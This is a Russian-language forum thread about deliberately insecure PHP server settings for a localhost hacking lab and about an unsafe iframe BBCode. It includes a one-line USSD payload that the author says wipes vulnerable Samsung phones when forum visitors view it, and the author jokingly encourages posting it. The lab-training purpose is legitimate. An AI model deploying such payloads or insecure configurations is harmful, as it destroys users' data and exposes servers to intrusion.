• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Вредные советы или полигон для хакеров


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
В этой теме выкладываем советы, как сделать систему уязвимой к хакерским атакам, да-да это не опечатка, для чего это нужно:

1)Для атак (Dmeh-Smeh-Smeh!!! ), на самом деле очень полезно как для безопасника, т.к. позволит определить например, как будет вести себя система в случае успешно атаки...

Хакеру-же отличный полигон для тренировок !

Это полезно также новичкам, которые настраивают свои сервера, а вдруг у вас так и настроено всё...Отдыхай!!!

Тренироваться лучше на локалхосте, например Денвер (http://ru-sphere.ru/threads/Устанав...-сервер-на-свой-компьютер-аля-virtualbox.557/), можно на других...

Итак начну:

Что-бы было камельфо, нужно внести некоторые изменения в конфигурацию нашего сервера, а именно интерпретатора php !big010101

Откройте конфигурационный файл php.ini, найдите и отредактируйте указанные ниже директивы:

Выкладываю с комментариями:

Код:
register_globals=ON ; глобализация переменных - потенциальная брешь в безопасности
magic_quotes=OFF ; отключаем магические кавычки для GET/POST/COOKIE - благоприятствует SQL-injection и позволяет использовать нуль-байт в инклудах
magic_quotes_runtime=OFF ; благоприятствует SQL-injection
magic_quotes_sybase=OFF ; благоприятствует SQL-injection
mysql.trace_mode=ON ; включает показ ошибок Mysql
allow_url_fopen=ON ; разрешает удаленное открытие файлов файловыми функциями
allow_url_include=ON ; разрешает удаленно инклудить файлы
error_reporting=E_ALL ; показ всех ошибок
disable_functions= ; никаких ограничений
safe_mode=OFF ; никаких ограничений
open_basedir= ; никаких ограничений
sql.safe_mode=OFF ;

Далее перезагружаем сервак, а что-бы было вообще круто, ищем какой-нибудь скриптик по старей, желательно форум или CSM, далее выкладываем своё творение на хакзону, или античат, с нехорошими комментариями и ждём, будет круто...so happy

Это была шутка, ну а если серьёзно:

Внимание! Данная конфигурация сервера способствует проявлению множества критических уязвимостей веб-приложений и снижает его защищённость. Используйте данную конфигурацию только для тестирования уязвимостей веб приложений и только на localhost-сервере.

В общем понятно в этой теме делимся ещё "Советами", пытаемся взломать такую систему и делимся результатами своей работы, хи-хи ! Отдыхай!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Есть ещё один вредный совет для форумов, таких популярных движков как phpbb3, XenForo, Vbulletin и т.д.:

Многие "Эксперты" дают рекомендации вставлять например видео с ВКонтакте при помощи BBCode:
Код:
[vkontakte]{TEXT}[/vkontakte]
с заменой HTML, с использованием скрытого фрейма т.е. примерно такой код:
Код:
<iframe src="{TEXT}" width="607" height="360" frameborder="0"></iframe>

Данный код отлично выполняет свою задачу, но человек даже с небольшим опытом в HTML должен сразу заметить, что этот код опасен и уязвим. По сути он позволяет встроить в сообщение фрейм с абсолютно любой ссылкой. Многим злоумышленникам только это и нужно. Обычно после взлома сайта первым делом они встраивают скрытые фреймы, в которые загружается код, пытающийся заразить машины всех ваших пользователей через известные уязвимости. То есть установив такой BBCode вы избавите хакеров от необходимости взламывать ваш сайт — всё и так уже готово.

Можно делать с таким форумом, что захотите, использовать различные уязвимости, вот например из весёлых:

Уязвимость в Андройде старая правда, но прикольная одна строка HTML кода может удалить данные или перезагрузить телефоны Samsung:

Достаточно запостить такой код:
Код:
[vkontakte]tel:*2767*3855%23[/vkontakte]

Стоит только попытаться прочесть это сообщение с уязвимого устройства — и все ваши данные будут уничтожены !!!wacko88 ohmy88 wink1
 

Rustam

Министерство любви.
Форумчанин
Регистрация
31.08.2016
Сообщения
71
Репутация
10
В этих ваших интернетах поговаривают, что есть очень хороший полигон для тренировок - metasploitable 2, но все никак руки не дойдут до него.
 
Верх Низ